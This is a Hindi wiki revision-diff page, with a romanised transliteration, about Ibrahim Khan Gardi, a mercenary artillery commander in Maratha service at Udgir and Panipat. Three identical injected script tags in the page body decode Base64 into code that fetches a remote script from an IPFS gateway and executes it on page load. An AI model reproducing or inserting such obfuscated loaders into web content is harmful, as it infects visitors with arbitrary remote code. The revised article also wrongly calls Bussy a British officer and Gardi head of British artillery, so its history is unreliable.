Difference between revisions of "इब्राहीम ख़ाँ गार्दी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 1: Line 1:
*इब्राहीम ख़ाँ गार्दी, एक भाड़े का सैनिक था, जिसे [[ब्रसी]] ने स्वयं प्रशिक्षित किया और जो उसके तोपख़ाने का प्रधान हो गया।
+
*'''इब्राहीम ख़ाँ गार्दी''' एक भाड़े का सैनिक था, जिसे ब्रिटिश सेनाधिकारी ब्रसी ने स्वयं प्रशिक्षित किया था।
*1757 ई. में उसने [[निज़ाम]] की नौकरी कर ली, परन्तु अगले ही साल वह [[पेशवा]] की सेवा में चला गया।
+
*अपनी योग्यता के बल पर इब्राहीम ख़ाँ शीघ्र ही ब्रिटिश तोपख़ाने का प्रधान हो गया।
*उसने 1760 ई. में [[उदगिर की लड़ाई]] में निज़ाम की फ़ौजों के ख़िलाफ़ [[मराठा|मराठों]] को विजय बनाने में भारी योगदान किया।
+
*1757 ई. में उसने निज़ाम की नौकरी कर ली थी, परन्तु अगले ही साल वह [[पेशवा]] की सेवा में [[महाराष्ट्र]] चला गया।
*वह [[पानीपत]] की तासरी लड़ाई में 9000 सिपाहियों तथा 40 तोपों के साथ मराठों की ओर से लड़ा।
+
*उसने 1760 ई. में उदगिर की लड़ाई में निज़ाम की फ़ौजों के ख़िलाफ़ [[मराठा|मराठों]] को विजय बनाने में भारी योगदान किया था।
*यद्यपि शुरू में उसने शत्रु की फ़ौजों को पछाड़ दिया तथापि अन्त में इस युद्ध में मराठों की पराजय हुई और विजयी [[अफ़ग़ान|अफ़ग़ानों]] ने उसे बन्दी बना लिया तथा बाद में मार डाला।
+
*गार्दी [[पानीपत]] की तासरी लड़ाई में 9000 सिपाहियों तथा 40 तोपों के साथ मराठों की ओर से लड़ा।
 +
*यद्यपि शुरू में उसने शत्रु की फ़ौजों को पछाड़ दिया, तथापि अन्त में इस युद्ध में मराठों की पराजय हुई।
 +
*विजयी [[अफ़ग़ान|अफ़ग़ानों]] द्वारा गार्दी बन्दी बना लिया गया और बाद में उसकी हत्या कर दी गई।
  
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
Line 16: Line 18:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{औपनिवेशिक काल}}
 +
[[Category:इतिहास कोश]]
 +
[[Category:मराठा साम्राज्य]]
 +
[[Category:औपनिवेशिक काल]]
 +
[[Category:अंग्रेज़ी शासन]]
 
__INDEX__
 
__INDEX__

Revision as of 06:31, 24 April 2011

  • ibrahim khaan gardi ek bha de ka sainik tha, jise british senadhikari brasi ne svayan prashikshit kiya tha.
  • apani yogyata ke bal par ibrahim khaan shighr hi british topakhane ka pradhan ho gaya.
  • 1757 ee. mean usane nizam ki naukari kar li thi, parantu agale hi sal vah peshava ki seva mean maharashtr chala gaya.
  • usane 1760 ee. mean udagir ki l daee mean nizam ki faujoan ke khilaf marathoan ko vijay banane mean bhari yogadan kiya tha.
  • gardi panipat ki tasari l daee mean 9000 sipahiyoan tatha 40 topoan ke sath marathoan ki or se l da.
  • yadyapi shuroo mean usane shatru ki faujoan ko pachha d diya, tathapi ant mean is yuddh mean marathoan ki parajay huee.
  • vijayi afaganoan dvara gardi bandi bana liya gaya aur bad mean usaki hatya kar di gee.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>